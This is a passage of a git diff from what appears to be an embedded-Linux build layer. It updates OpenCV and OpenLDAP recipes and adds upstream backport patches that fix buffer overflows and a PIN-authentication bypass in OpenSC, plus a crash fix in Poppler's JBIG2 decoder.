\ - git://github.com/opencv/opencv_3rdparty.git;branch=contrib_face_alignment_20170818;destsuffix=face;name=face;protocol=https \ - git://github.com/WeChatCV/opencv_3rdparty.git;branch=wechat_qrcode;destsuffix=wechat_qrcode;name=wechat-qrcode;protocol=https \ + git://github.com/opencv/opencv_contrib.git;destsuffix=git/contrib;name=contrib;branch=master;protocol=https \ + git://github.com/opencv/opencv_3rdparty.git;branch=ippicv/master_20191018;destsuffix=git/ipp;name=ipp;protocol=https \ + git://github.com/opencv/opencv_3rdparty.git;branch=contrib_xfeatures2d_boostdesc_20161012;destsuffix=git/boostdesc;name=boostdesc;protocol=https \ + git://github.com/opencv/opencv_3rdparty.git;branch=contrib_xfeatures2d_vgg_20160317;destsuffix=git/vgg;name=vgg;protocol=https \ + git://github.com/opencv/opencv_3rdparty.git;branch=contrib_face_alignment_20170818;destsuffix=git/face;name=face;protocol=https \ + git://github.com/WeChatCV/opencv_3rdparty.git;branch=wechat_qrcode;destsuffix=git/wechat_qrcode;name=wechat-qrcode;protocol=https \ file://0001-3rdparty-ippicv-Use-pre-downloaded-ipp.patch \ file://0003-To-fix-errors-as-following.patch \ file://0001-Temporarliy-work-around-deprecated-ffmpeg-RAW-functi.patch \ @@ -52,8 +52,10 @@ SRC_URI = "git://github.com/opencv/opencv.git;name=opencv;branch=master;protocol file://download.patch \ file://0001-Make-ts-module-external.patch \ file://0001-core-vsx-update-vec_absd-workaround-condition.patch \ + file://CVE-2023-2617.patch;patchdir=contrib \ + file://CVE-2023-2618.patch;patchdir=contrib \ " -SRC_URI:append:riscv64 = " file://0001-Use-Os-to-compile-tinyxml2.cpp.patch;patchdir=../contrib" +SRC_URI:append:riscv64 = " file://0001-Use-Os-to-compile-tinyxml2.cpp.patch;patchdir=contrib" S = "${WORKDIR}/git" @@ -62,7 +64,7 @@ S = "${WORKDIR}/git" OPENCV_DLDIR = "${WORKDIR}/downloads" do_unpack_extra() { - tar xzf ${WORKDIR}/ipp/ippicv/${IPP_FILENAME} -C ${WORKDIR} + tar xzf ${S}/ipp/ippicv/${IPP_FILENAME} -C ${S} md5() { # Return the MD5 of $1 @@ -77,22 +79,22 @@ do_unpack_extra() { test -e $DEST || ln -s $F $DEST done } - cache xfeatures2d/boostdesc ${WORKDIR}/boostdesc/*.i - cache xfeatures2d/vgg ${WORKDIR}/vgg/*.i - cache data ${WORKDIR}/face/*.dat - cache wechat_qrcode ${WORKDIR}/wechat_qrcode/*.caffemodel - cache wechat_qrcode ${WORKDIR}/wechat_qrcode/*.prototxt + cache xfeatures2d/boostdesc ${S}/boostdesc/*.i + cache xfeatures2d/vgg ${S}/vgg/*.i + cache data ${S}/face/*.dat + cache wechat_qrcode ${S}/wechat_qrcode/*.caffemodel + cache wechat_qrcode ${S}/wechat_qrcode/*.prototxt } addtask unpack_extra after do_unpack before do_patch CMAKE_VERBOSE = "VERBOSE=1" -EXTRA_OECMAKE = "-DOPENCV_EXTRA_MODULES_PATH=${WORKDIR}/contrib/modules \ +EXTRA_OECMAKE = "-DOPENCV_EXTRA_MODULES_PATH=${S}/contrib/modules \ -DWITH_1394=OFF \ -DENABLE_PRECOMPILED_HEADERS=OFF \ -DCMAKE_SKIP_RPATH=ON \ -DOPENCV_ICV_HASH=${IPP_MD5} \ - -DIPPROOT=${WORKDIR}/ippicv_lnx \ + -DIPPROOT=${S}/ippicv_lnx \ -DOPENCV_GENERATE_PKGCONFIG=ON \ -DOPENCV_DOWNLOAD_PATH=${OPENCV_DLDIR} \ -DOPENCV_ALLOW_DOWNLOADS=OFF \ diff --git a/meta-oe/recipes-support/openldap/openldap/0001-ldif-filter-fix-parallel-build-failure.patch b/meta-oe/recipes-support/openldap/openldap/0001-ldif-filter-fix-parallel-build-failure.patch deleted file mode 100644 index b42bd9764f..0000000000 --- a/meta-oe/recipes-support/openldap/openldap/0001-ldif-filter-fix-parallel-build-failure.patch +++ /dev/null @@ -1,32 +0,0 @@ -From 9e4ccd1e78ceac8de1ab66ee62ee216f1fbd4956 Mon Sep 17 00:00:00 2001 -From: Yi Zhao <yi.zhao@windriver.com> -Date: Thu, 2 Dec 2021 11:38:15 +0800 -Subject: [PATCH] ldif-filter: fix parallel build failure - -Add slapd-common.o as dependency for ldif-filter to fix the parallel -build failure: - ld: cannot find slapd-common.o: No such file or directory - -Upstream-Status: Pending - -Signed-off-by: Yi Zhao <yi.zhao@windriver.com> ---- - tests/progs/Makefile.in | 2 +- - 1 file changed, 1 insertion(+), 1 deletion(-) - -diff --git a/tests/progs/Makefile.in b/tests/progs/Makefile.in -index 13f1e8be2..e4f4ccf98 100644 ---- a/tests/progs/Makefile.in -+++ b/tests/progs/Makefile.in -@@ -56,7 +56,7 @@ slapd-modify: slapd-modify.o $(OBJS) $(XLIBS) - slapd-bind: slapd-bind.o $(OBJS) $(XLIBS) - $(LTLINK) -o $@ slapd-bind.o $(OBJS) $(LIBS) - --ldif-filter: ldif-filter.o $(XLIBS) -+ldif-filter: ldif-filter.o $(OBJS) $(XLIBS) - $(LTLINK) -o $@ ldif-filter.o $(OBJS) $(LIBS) - - slapd-mtread: slapd-mtread.o $(OBJS) $(XLIBS) --- -2.25.1 - diff --git a/meta-oe/recipes-support/openldap/openldap/0001-libraries-Makefile.in-ignore-the-mkdir-errors.patch b/meta-oe/recipes-support/openldap/openldap/0001-libraries-Makefile.in-ignore-the-mkdir-errors.patch deleted file mode 100644 index 552726bb0a..0000000000 --- a/meta-oe/recipes-support/openldap/openldap/0001-libraries-Makefile.in-ignore-the-mkdir-errors.patch +++ /dev/null @@ -1,33 +0,0 @@ -From 690f69791eb6cd0d7e94b4d73219ee864de27f62 Mon Sep 17 00:00:00 2001 -From: Yi Zhao <yi.zhao@windriver.com> -Date: Mon, 10 Jan 2022 10:13:51 +0800 -Subject: [PATCH] libraries/Makefile.in: ignore the mkdir errors - -Ignore the mkdir errors to fix the parallel build failure: - -../../build/shtool mkdir -p TOPDIR/tmp-glibc/work/cortexa15t2hf-neon-wrs-linux-gnueabi/openldap/2.5.9-r0/image/usr/lib -mkdir: cannot create directory 'TOPDIR/tmp-glibc/work/cortexa15t2hf-neon-wrs-linux-gnueabi/openldap/2.5.9-r0/image/usr/lib': File exists - -Upstream-Status: Pending - -Signed-off-by: Yi Zhao <yi.zhao@windriver.com> ---- - libraries/Makefile.in | 2 +- - 1 file changed, 1 insertion(+), 1 deletion(-) - -diff --git a/libraries/Makefile.in b/libraries/Makefile.in -index d9cb2ff..c6b251f 100644 ---- a/libraries/Makefile.in -+++ b/libraries/Makefile.in -@@ -24,7 +24,7 @@ PKGCONFIG_DIR=$(DESTDIR)$(libdir)/pkgconfig - PKGCONFIG_SRCDIRS=liblber libldap - - install-local: -- @$(MKDIR) $(PKGCONFIG_DIR) -+ @-$(MKDIR) $(PKGCONFIG_DIR) - @for i in $(PKGCONFIG_SRCDIRS); do \ - $(INSTALL_DATA) $$i/*.pc $(PKGCONFIG_DIR); \ - done --- -2.17.1 - diff --git a/meta-oe/recipes-support/openldap/openldap/0001-librewrite-include-ldap_pvt_thread.h-before-redefini.patch b/meta-oe/recipes-support/openldap/openldap/0001-librewrite-include-ldap_pvt_thread.h-before-redefini.patch deleted file mode 100644 index bcd1525b67..0000000000 --- a/meta-oe/recipes-support/openldap/openldap/0001-librewrite-include-ldap_pvt_thread.h-before-redefini.patch +++ /dev/null @@ -1,54 +0,0 @@ -From 79381ab335898c9184e22dd25b544adefa9bf6c5 Mon Sep 17 00:00:00 2001 -From: Khem Raj <raj.khem@gmail.com> -Date: Mon, 7 Feb 2022 16:26:57 -0800 -Subject: [PATCH] librewrite: include ldap_pvt_thread.h before redefining - calloc - -This helps compiling with musl, where sched.h is included by -ldap_pvt_thread.h which provides prototype for calloc() and conflicts - -/usr/include/sched.h:84:7: error: conflicting types for 'ber_memcalloc' -| void *calloc(size_t, size_t); -| ^1 -| warning and 1 error generated. -| ./rewrite-int.h:44:21: note: expanded from macro 'calloc' -| #define calloc(x,y) ber_memcalloc(x,y) -| ^ - -Upstream-Status: Pending -Signed-off-by: Khem Raj <raj.khem@gmail.com> ---- - libraries/librewrite/rewrite-int.h | 10 +++++----- - 1 file changed, 5 insertions(+), 5 deletions(-) - -diff --git a/libraries/librewrite/rewrite-int.h b/libraries/librewrite/rewrite-int.h -index 4481dd3..5ec226d 100644 ---- a/libraries/librewrite/rewrite-int.h -+++ b/libraries/librewrite/rewrite-int.h -@@ -40,6 +40,11 @@ - - #include <rewrite.h> - -+#ifndef NO_THREADS -+#define USE_REWRITE_LDAP_PVT_THREADS -+#include <ldap_pvt_thread.h> -+#endif -+ - #define malloc(x) ber_memalloc(x) - #define calloc(x,y) ber_memcalloc(x,y) - #define realloc(x,y) ber_memrealloc(x,y) -@@ -47,11 +52,6 @@ - #undef strdup - #define strdup(x) ber_strdup(x) - --#ifndef NO_THREADS --#define USE_REWRITE_LDAP_PVT_THREADS --#include <ldap_pvt_thread.h> --#endif -- - /* - * For details, see RATIONALE. - */ --- -2.35.1 - diff --git a/meta-oe/recipes-support/openldap/openldap_2.5.12.bb b/meta-oe/recipes-support/openldap/openldap_2.5.16.bb index e4475e5069..9e9d05917d 100644 --- a/meta-oe/recipes-support/openldap/openldap_2.5.12.bb +++ b/meta-oe/recipes-support/openldap/openldap_2.5.16.bb @@ -19,13 +19,10 @@ SRC_URI = "http://www.openldap.org/software/download/OpenLDAP/openldap-release/$ file://initscript \ file://slapd.service \ file://remove-user-host-pwd-from-version.patch \ - file://0001-ldif-filter-fix-parallel-build-failure.patch \ file://0001-build-top.mk-unset-STRIP_OPTS.patch \ - file://0001-libraries-Makefile.in-ignore-the-mkdir-errors.patch \ - file://0001-librewrite-include-ldap_pvt_thread.h-before-redefini.patch \ " -SRC_URI[sha256sum] = "d5086cbfc49597fa7d0670a429a9054552d441b16ee8b2435412797ab0e37b96" +SRC_URI[sha256sum] = "546ba591822e8bb0e467d40c4d4a30f89d937c3a507fe83a578f582f6a211327" DEPENDS = "util-linux groff-native" diff --git a/meta-oe/recipes-support/opensc/files/CVE-2023-2977.patch b/meta-oe/recipes-support/opensc/files/CVE-2023-2977.patch new file mode 100644 index 0000000000..6a635a7ce6 --- /dev/null +++ b/meta-oe/recipes-support/opensc/files/CVE-2023-2977.patch @@ -0,0 +1,53 @@ +commit 81944d1529202bd28359bede57c0a15deb65ba8a +Author: fullwaywang <fullwaywang@tencent.com> +Date: Mon May 29 10:38:48 2023 +0800 +Subject: [PATCH] pkcs15init: correct left length calculation to fix buffer overrun bug. + + Fixes #2785 + +CVE: CVE-2023-2977 + +Upstream-Status: Backport [https://github.com/OpenSC/OpenSC/pull/2787/commits/3bf3ab2f9091f984cda6dd910654ccbbe3f06a40] + +Signed-off-by: Soumya <soumya.sambu@windriver.com> +--- + +diff --git a/src/pkcs15init/pkcs15-cardos.c b/src/pkcs15init/pkcs15-cardos.c +index 9715cf39..f41f73c3 100644 +--- a/src/pkcs15init/pkcs15-cardos.c ++++ b/src/pkcs15init/pkcs15-cardos.c +@@ -872,7 +872,7 @@ static int cardos_have_verifyrc_package(sc_card_t *card) + sc_apdu_t apdu; + u8 rbuf[SC_MAX_APDU_BUFFER_SIZE]; + int r; +- const u8 *p = rbuf, *q; ++ const u8 *p = rbuf, *q, *pp; + size_t len, tlen = 0, ilen = 0; + + sc_format_apdu(card, &apdu, SC_APDU_CASE_2_SHORT, 0xca, 0x01, 0x88); +@@ -888,13 +888,13 @@ static int cardos_have_verifyrc_package(sc_card_t *card) + return 0; + + while (len != 0) { +- p = sc_asn1_find_tag(card->ctx, p, len, 0xe1, &tlen); +- if (p == NULL) ++ pp = sc_asn1_find_tag(card->ctx, p, len, 0xe1, &tlen); ++ if (pp == NULL) + return 0; + if (card->type == SC_CARD_TYPE_CARDOS_M4_3) { + /* the verifyRC package on CardOS 4.3B use Manufacturer ID 0x01 */ + /* and Package Number 0x07 */ +- q = sc_asn1_find_tag(card->ctx, p, tlen, 0x01, &ilen); ++ q = sc_asn1_find_tag(card->ctx, pp, tlen, 0x01, &ilen); + if (q == NULL || ilen != 4) + return 0; + if (q[0] == 0x07) +@@ -902,7 +902,7 @@ static int cardos_have_verifyrc_package(sc_card_t *card) + } else if (card->type == SC_CARD_TYPE_CARDOS_M4_4) { + /* the verifyRC package on CardOS 4.4 use Manufacturer ID 0x03 */ + /* and Package Number 0x02 */ +- q = sc_asn1_find_tag(card->ctx, p, tlen, 0x03, &ilen); ++ q = sc_asn1_find_tag(card->ctx, pp, tlen, 0x03, &ilen); + if (q == NULL || ilen != 4) + return 0; + if (q[0] == 0x02) diff --git a/meta-oe/recipes-support/opensc/opensc/CVE-2023-40660.patch b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40660.patch new file mode 100644 index 0000000000..74e547298f --- /dev/null +++ b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40660.patch @@ -0,0 +1,55 @@ +Origin: https://github.com/OpenSC/OpenSC/commit/868f76fb31255fd3fdacfc3e476452efeb61c3e7 +From: Frank Morgner <frankmorgner@gmail.com> +Date: Wed, 21 Jun 2023 12:27:23 +0200 +Subject: Fixed PIN authentication bypass + +If two processes are accessing a token, then one process may leave the +card usable with an authenticated PIN so that a key may sign/decrypt any +data. This is especially the case if the token does not support a way of +resetting the authentication status (logout). + +We have some tracking of the authentication status in software via +PKCS#11, Minidriver (os-wise) and CryptoTokenKit, which is why a +PIN-prompt will appear even though the card may technically be unlocked +as described in the above example. However, before this change, an empty +PIN was not verified (likely yielding an error during PIN-verification), +but it was just checked whether the PIN is authenticated. This defeats +the purpose of the PIN verification, because an empty PIN is not the +correct one. Especially during OS Logon, we don't want that kind of +shortcut, but we want the user to verify the correct PIN (even though +the token was left unattended and authentication at the computer). + +This essentially reverts commit e6f7373ef066cfab6e3162e8b5f692683db23864. + +CVE: CVE-2023-40660 +Upstream-Status: Backport [https://salsa.debian.org/opensc-team/opensc/-/commit/940e8bc764047c873f88bb1396933a5368d03533] +Signed-off-by: Virendra Thakur <virendrak@kpit.com> +--- + src/libopensc/pkcs15-pin.c | 13 ------------- + 1 file changed, 13 deletions(-) + +diff --git a/src/libopensc/pkcs15-pin.c b/src/libopensc/pkcs15-pin.c +index 80a185fecd..393234efe4 100644 +--- a/src/libopensc/pkcs15-pin.c ++++ b/src/libopensc/pkcs15-pin.c +@@ -307,19 +307,6 @@ + LOG_FUNC_RETURN(ctx, SC_ERROR_INVALID_PIN_REFERENCE); + auth_info = (struct sc_pkcs15_auth_info *)pin_obj->data; + +- /* +- * if pin cache is disabled, we can get here with no PIN data. +- * in this case, to avoid error or unnecessary pin prompting on pinpad, +- * check if the PIN has been already verified and the access condition +- * is still open on card. +- */ +- if (pinlen == 0) { +- r = sc_pkcs15_get_pin_info(p15card, pin_obj); +- +- if (r == SC_SUCCESS && auth_info->logged_in == SC_PIN_STATE_LOGGED_IN) +- LOG_FUNC_RETURN(ctx, r); +- } +- + r = _validate_pin(p15card, auth_info, pinlen); + + if (r) + diff --git a/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-1.patch b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-1.patch new file mode 100644 index 0000000000..3ecff558cf --- /dev/null +++ b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-1.patch @@ -0,0 +1,47 @@ +Origin: https://github.com/OpenSC/OpenSC/commit/245efe608d083fd4e4ec96793fdefd218e26fde7 +From: Jakub Jelen <jjelen@redhat.com> +Date: Thu, 17 Aug 2023 13:54:42 +0200 +Subject: pkcs15: Avoid buffer overflow when getting last update + +Thanks oss-fuzz + +https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=60769 + +CVE: CVE-2023-40661 +Upstream-Status: Backport [https://salsa.debian.org/opensc-team/opensc/-/commit/8026fb4ca0ed53d970c6c497252eb264d4192d50] +Signed-off-by: Virendra Thakur <virendrak@kpit.com> +Comment: Hunk refreshed based on codebase. + +--- + src/libopensc/pkcs15.c | 16 +++++++++------- + 1 file changed, 9 insertions(+), 7 deletions(-) + +diff --git a/src/libopensc/pkcs15.c b/src/libopensc/pkcs15.c +index eb7fc6afcd..4215b733a8 100644 +--- a/src/libopensc/pkcs15.c ++++ b/src/libopensc/pkcs15.c +@@ -528,7 +528,7 @@ + struct sc_context *ctx = p15card->card->ctx; + struct sc_file *file = NULL; + struct sc_asn1_entry asn1_last_update[C_ASN1_LAST_UPDATE_SIZE]; +- unsigned char *content, last_update[32]; ++ unsigned char *content, last_update[32] = {0}; + size_t lupdate_len = sizeof(last_update) - 1; + int r, content_len; + size_t size; +@@ -564,9 +564,11 @@ + if (r < 0) + return NULL; + +- p15card->tokeninfo->last_update.gtime = strdup((char *)last_update); +- if (!p15card->tokeninfo->last_update.gtime) +- return NULL; ++ if (asn1_last_update[0].flags & SC_ASN1_PRESENT) { ++ p15card->tokeninfo->last_update.gtime = strdup((char *)last_update); ++ if (!p15card->tokeninfo->last_update.gtime) ++ return NULL; ++ } + done: + sc_log(ctx, "lastUpdate.gtime '%s'", p15card->tokeninfo->last_update.gtime); + return p15card->tokeninfo->last_update.gtime; + diff --git a/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-2.patch b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-2.patch new file mode 100644 index 0000000000..39e729c5a9 --- /dev/null +++ b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-2.patch @@ -0,0 +1,32 @@ +Origin: https://github.com/OpenSC/OpenSC/commit/440ca666eff10cc7011901252d20f3fc4ea23651 +From: Jakub Jelen <jjelen@redhat.com> +Date: Thu, 17 Aug 2023 13:41:36 +0200 +Subject: setcos: Avoid buffer underflow + +Thanks oss-fuzz + +https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=60672 +CVE: CVE-2023-40661 +Upstream-Status: Backport [https://salsa.debian.org/opensc-team/opensc/-/commit/8026fb4ca0ed53d970c6c497252eb264d4192d50] +Signed-off-by: Virendra Thakur <virendrak@kpit.com> +Comment: Hunk refreshed based on codebase. +--- + src/pkcs15init/pkcs15-setcos.c | 4 ++++ + 1 file changed, 4 insertions(+) + +diff --git a/src/pkcs15init/pkcs15-setcos.c b/src/pkcs15init/pkcs15-setcos.c +index 1b56afe6d9..1907b47f9d 100644 +--- a/src/pkcs15init/pkcs15-setcos.c ++++ b/src/pkcs15init/pkcs15-setcos.c +@@ -346,6 +346,10 @@ + + /* Replace the path of instantiated key template by the path from the object data. */ + memcpy(&file->path, &key_info->path, sizeof(file->path)); ++ if (file->path.len < 2) { ++ sc_file_free(file); ++ LOG_TEST_RET(ctx, SC_ERROR_INVALID_DATA, "Invalid path"); ++ } + file->id = file->path.value[file->path.len - 2] * 0x100 + + file->path.value[file->path.len - 1]; + + diff --git a/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-3.patch b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-3.patch new file mode 100644 index 0000000000..7950cf91df --- /dev/null +++ b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-3.patch @@ -0,0 +1,31 @@ +Origin: https://github.com/OpenSC/OpenSC/commit/41d61da8481582e12710b5858f8b635e0a71ab5e +From: Jakub Jelen <jjelen@redhat.com> +Date: Wed, 20 Sep 2023 10:13:57 +0200 +Subject: oberthur: Avoid buffer overflow + +Thanks oss-fuzz + +https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=60650 +CVE: CVE-2023-40661 +Upstream-Status: Backport [https://salsa.debian.org/opensc-team/opensc/-/commit/8026fb4ca0ed53d970c6c497252eb264d4192d50] +Signed-off-by: Virendra Thakur <virendrak@kpit.com> +Comment: Hunk refreshed based on codebase. +--- + src/pkcs15init/pkcs15-oberthur.c | 3 +++ + 1 file changed, 3 insertions(+) + +diff --git a/src/pkcs15init/pkcs15-oberthur.c b/src/pkcs15init/pkcs15-oberthur.c +index ad2cabd530..c441ab1e76 100644 +--- a/src/pkcs15init/pkcs15-oberthur.c ++++ b/src/pkcs15init/pkcs15-oberthur.c +@@ -688,6 +688,9 @@ + if (object->type != SC_PKCS15_TYPE_PRKEY_RSA) + LOG_TEST_RET(ctx, SC_ERROR_NOT_SUPPORTED, "Create key failed: RSA only supported"); + ++ if (key_info->path.len < 2) ++ LOG_TEST_RET(ctx, SC_ERROR_OBJECT_NOT_VALID, "The path needs to be at least to bytes long"); ++ + sc_log(ctx, "create private key ID:%s", sc_pkcs15_print_id(&key_info->id)); + /* Here, the path of private key file should be defined. + * Nevertheless, we need to instantiate private key to get the ACLs. */ + diff --git a/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-4.patch b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-4.patch new file mode 100644 index 0000000000..797f8ad3b1 --- /dev/null +++ b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-4.patch @@ -0,0 +1,28 @@ +Origin: https://github.com/OpenSC/OpenSC/commit/578aed8391ef117ca64a9e0cba8e5c264368a0ec +From: Frank Morgner <frankmorgner@gmail.com> +Date: Thu, 8 Dec 2022 00:27:18 +0100 +Subject: sc_pkcs15init_rmdir: prevent out of bounds write + +fixes https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=53927 +CVE: CVE-2023-40661 +Upstream-Status: Backport [https://salsa.debian.org/opensc-team/opensc/-/commit/8026fb4ca0ed53d970c6c497252eb264d4192d50] +Signed-off-by: Virendra Thakur <virendrak@kpit.com> +Comment: Hunk refreshed based on codebase. +--- + src/pkcs15init/pkcs15-lib.c | 2 ++ + 1 file changed, 2 insertions(+) + +diff --git a/src/pkcs15init/pkcs15-lib.c b/src/pkcs15init/pkcs15-lib.c +index 91cee37310..3df03c6e1f 100644 +--- a/src/pkcs15init/pkcs15-lib.c ++++ b/src/pkcs15init/pkcs15-lib.c +@@ -666,6 +666,8 @@ + + path = df->path; + path.len += 2; ++ if (path.len > SC_MAX_PATH_SIZE) ++ return SC_ERROR_INTERNAL; + + nfids = r / 2; + while (r >= 0 && nfids--) { + diff --git a/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-5.patch b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-5.patch new file mode 100644 index 0000000000..e173e65575 --- /dev/null +++ b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-5.patch @@ -0,0 +1,30 @@ +Origin: https://github.com/OpenSC/OpenSC/commit/c449a181a6988cc1e8dc8764d23574e48cdc3fa6 +From: =?UTF-8?q?Veronika=20Hanul=C3=ADkov=C3=A1?= <vhanulik@redhat.com> +Date: Mon, 19 Jun 2023 16:14:51 +0200 +Subject: pkcs15-cflex: check path length to prevent underflow + +Thanks OSS-Fuzz +https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=58932 +CVE: CVE-2023-40661 +Upstream-Status: Backport [https://salsa.debian.org/opensc-team/opensc/-/commit/8026fb4ca0ed53d970c6c497252eb264d4192d50] +Signed-off-by: Virendra Thakur <virendrak@kpit.com> +Comment: Hunk refreshed based on codebase. +--- + src/pkcs15init/pkcs15-cflex.c | 3 +++ + 1 file changed, 3 insertions(+) + +diff --git a/src/pkcs15init/pkcs15-cflex.c b/src/pkcs15init/pkcs15-cflex.c +index d06568073d..ce1d48e62c 100644 +--- a/src/pkcs15init/pkcs15-cflex.c ++++ b/src/pkcs15init/pkcs15-cflex.c +@@ -56,6 +56,9 @@ + int r = 0; + /* Select the parent DF */ + path = df->path; ++ if (path.len < 2) { ++ return SC_ERROR_INVALID_ARGUMENTS; ++ } + path.len -= 2; + r = sc_select_file(p15card->card, &path, &parent); + if (r < 0) + diff --git a/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-6.patch b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-6.patch new file mode 100644 index 0000000000..abb524de29 --- /dev/null +++ b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-6.patch @@ -0,0 +1,30 @@ +Origin: https://github.com/OpenSC/OpenSC/commit/df5a176bfdf8c52ba89c7fef1f82f6f3b9312bc1 +From: Veronika Hanulikova <xhanulik@fi.muni.cz> +Date: Fri, 10 Feb 2023 11:47:34 +0100 +Subject: Check array bounds + +Thanks OSS-Fuzz +https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=54312 +CVE: CVE-2023-40661 +Upstream-Status: Backport [https://salsa.debian.org/opensc-team/opensc/-/commit/8026fb4ca0ed53d970c6c497252eb264d4192d50] +Signed-off-by: Virendra Thakur <virendrak@kpit.com> +Comment: Hunk refreshed based on codebase. +--- + src/libopensc/muscle.c | 3 +++ + 1 file changed, 3 insertions(+) + +diff --git a/src/libopensc/muscle.c b/src/libopensc/muscle.c +index 61a4ec24d8..9d01e0c113 100644 +--- a/src/libopensc/muscle.c ++++ b/src/libopensc/muscle.c +@@ -183,6 +183,9 @@ + sc_apdu_t apdu; + int r; + ++ if (dataLength + 9 > MSC_MAX_APDU) ++ return SC_ERROR_INVALID_ARGUMENTS; ++ + sc_format_apdu(card, &apdu, SC_APDU_CASE_3_SHORT, 0x54, 0x00, 0x00); + apdu.lc = dataLength + 9; + if (card->ctx->debug >= 2) + diff --git a/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-7.patch b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-7.patch new file mode 100644 index 0000000000..858a996ed7 --- /dev/null +++ b/meta-oe/recipes-support/opensc/opensc/CVE-2023-40661-7.patch @@ -0,0 +1,40 @@ +Origin: https://github.com/OpenSC/OpenSC/commit/5631e9843c832a99769def85b7b9b68b4e3e3959 +From: Veronika Hanulikova <xhanulik@fi.muni.cz> +Date: Fri, 3 Mar 2023 16:07:38 +0100 +Subject: Check length of string before making copy + +Thanks OSS-Fuzz +https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=55851 +https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=55998 +CVE: CVE-2023-40661 +Upstream-Status: Backport [https://salsa.debian.org/opensc-team/opensc/-/commit/8026fb4ca0ed53d970c6c497252eb264d4192d50] +Signed-off-by: Virendra Thakur <virendrak@kpit.com> +Comment: Hunk refreshed based on codebase. +--- + src/pkcs15init/profile.c | 6 ++++++ + 1 file changed, 6 insertions(+) + +diff --git a/src/pkcs15init/profile.c b/src/pkcs15init/profile.c +index 2b793b0282..3bad1e8536 100644 +--- a/src/pkcs15init/profile.c ++++ b/src/pkcs15init/profile.c +@@ -1465,6 +1465,8 @@ + while (argc--) { + unsigned int op, method, id; + ++ if (strlen(*argv) >= sizeof(oper)) ++ goto bad; + strlcpy(oper, *argv++, sizeof(oper)); + if ((what = strchr(oper, '=')) == NULL) + goto bad; +@@ -2128,6 +2130,9 @@ + return get_uint(cur, value, type); + } + ++ if (strlen(value) >= sizeof(temp)) ++ return 1; ++ + n = strcspn(value, "0123456789x"); + strlcpy(temp, value, (sizeof(temp) > n) ? n + 1 : sizeof(temp)); + + diff --git a/meta-oe/recipes-support/opensc/opensc_0.22.0.bb b/meta-oe/recipes-support/opensc/opensc_0.22.0.bb index f8b4af0c4f..770c2d686b 100644 --- a/meta-oe/recipes-support/opensc/opensc_0.22.0.bb +++ b/meta-oe/recipes-support/opensc/opensc_0.22.0.bb @@ -14,7 +14,21 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=cb8aedd3bced19bd8026d96a8b6876d7" #v0.21.0 SRCREV = "c902e1992195e00ada12d71beb1029287cd72037" SRC_URI = "git://github.com/OpenSC/OpenSC;branch=master;protocol=https \ + file://CVE-2023-2977.patch \ + file://CVE-2023-40660.patch \ + file://CVE-2023-40661-1.patch \ + file://CVE-2023-40661-2.patch \ + file://CVE-2023-40661-3.patch \ + file://CVE-2023-40661-4.patch \ + file://CVE-2023-40661-5.patch \ + file://CVE-2023-40661-6.patch \ + file://CVE-2023-40661-7.patch \ " + +# CVE-2021-34193 is a duplicate CVE covering the 5 individual +# https://github.com/OpenSC/OpenSC/pull/2855/commits/7a049fc3922060fb75cb9fea9e58eef9edc357ae +CVE_CHECK_IGNORE += "CVE-2021-34193" + DEPENDS = "virtual/libiconv openssl" S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-support/poppler/poppler/0001-JBIG2Stream-Fix-crash-on-broken-file.patch b/meta-oe/recipes-support/poppler/poppler/0001-JBIG2Stream-Fix-crash-on-broken-file.patch new file mode 100644 index 0000000000..4a8ea233c8 --- /dev/null +++ b/meta-oe/recipes-support/poppler/poppler/0001-JBIG2Stream-Fix-crash-on-broken-file.patch @@ -0,0 +1,41 @@ +From 27354e9d9696ee2bc063910a6c9a6b27c5184a52 Mon Sep 17 00:00:00 2001 +From: Albert Astals Cid <aacid@kde.org> +Date: Thu, 25 Aug 2022 00:14:22 +0200 +Subject: [PATCH] JBIG2Stream: Fix crash on broken file + +https://github.com/jeffssh/CVE-2021-30860 + +Thanks to David Warren for the heads up + +CVE: CVE-2021-30860 + +References: +https://nvd.nist.gov/vuln/detail/CVE-2021-30860 + +Upstream-Status: Backport +[https://gitlab.freedesktop.org/poppler/poppler/-/commit/27354e9d9696ee2bc063910a6c9a6b27c5184a52] + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + poppler/JBIG2Stream.cc | 6 +++++- + 1 file changed, 5 insertions(+), 1 deletion(-) + +diff --git a/poppler/JBIG2Stream.cc b/poppler/JBIG2Stream.cc +index 662276e5..9f70431d 100644 +--- a/poppler/JBIG2Stream.cc ++++ b/poppler/JBIG2Stream.cc +@@ -1976,7 +1976,11 @@ void JBIG2Stream::readTextRegionSeg(unsigned int segNum, bool imm, bool lossless + for (i = 0; i < nRefSegs; ++i) { + if ((seg = findSegment(refSegs[i]))) { + if (seg->getType() == jbig2SegSymbolDict) { +- numSyms += ((JBIG2SymbolDict *)seg)->getSize(); ++ const unsigned int segSize = ((JBIG2SymbolDict *)seg)->getSize(); 